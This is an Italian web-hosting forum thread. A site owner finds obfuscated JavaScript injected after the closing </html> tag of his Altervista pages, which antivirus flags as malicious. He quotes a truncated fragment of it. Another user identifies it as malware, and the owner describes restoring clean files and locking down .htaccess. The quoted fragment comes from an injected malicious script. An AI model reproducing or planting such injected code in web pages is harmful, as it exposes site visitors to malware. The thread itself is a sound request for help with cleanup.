Strano codice oltre la fine della pagina

[netgreg]

Sito http://www.gestionecaldaie.altervista.org
Mi sono accorto che dopo la fine della pagina </html> c'è una paginata di codice di una strana funzione, che oltre a rallentare il tutto, da Sophos è vista come qualcosa di malevolo: è stato bloccato l'accesso ad un sito web ad alto rischio: "ofgcuxtomcop.com/index.php" as "MalHtmlGen-A".

Incollo sotto inizio e fine della function e in mezzo ho tagliato quasi tutto:

Codice HTML:

</body></html>
<script>(function(f_bcr){f_bcr();setTimeout(function(){d='f_bbT={v7bvbbv1av86vc2vc7vc1vc6v80:"",v7bvbbv2av86vc2vc8vc1vc6v80:"",v9bvbbv3av86vc2vc7vc1vc6v30:"l=St",v86v85v4evb2v90v78vcfv92v75:"ring.f"..... MIO MEGA CUT....}return f_bcx.join(',')+','}else{return f_bci[f_bcq]}}})</script>

Preciso che aprendo il file con notepad questo codice non esiste.
Il sito non risulta infettato da virus e tutto lascia pensare sia un codice di protezine di Altervista. C'è un modo per farne a meno?
Grazie
Greg

[karl94]

Non è codice inserito da AlterVista, è un malware. È stato probabilmente inserito sfruttando una vulnerabilità del codice, devi cercarla e rimuoverla. Ovviamente dovrai rimuovere anche il codice stesso.

[netgreg]

Ho risolto ricaricando il miei files php puliti e anche l'.htaccess.
Infatti il furbetto aveva modificato il mio htaccess mettendo a inizio file questa riga:
php_value register_globals 0

Poi ho provveduto a proteggere il file htaccess in questo modo:
# proteggi htaccess file
<Files .htaccess>
order allow,deny
deny from all
</Files>

Ma cosa ci trovano di interessante in un pseudo-sito come questo?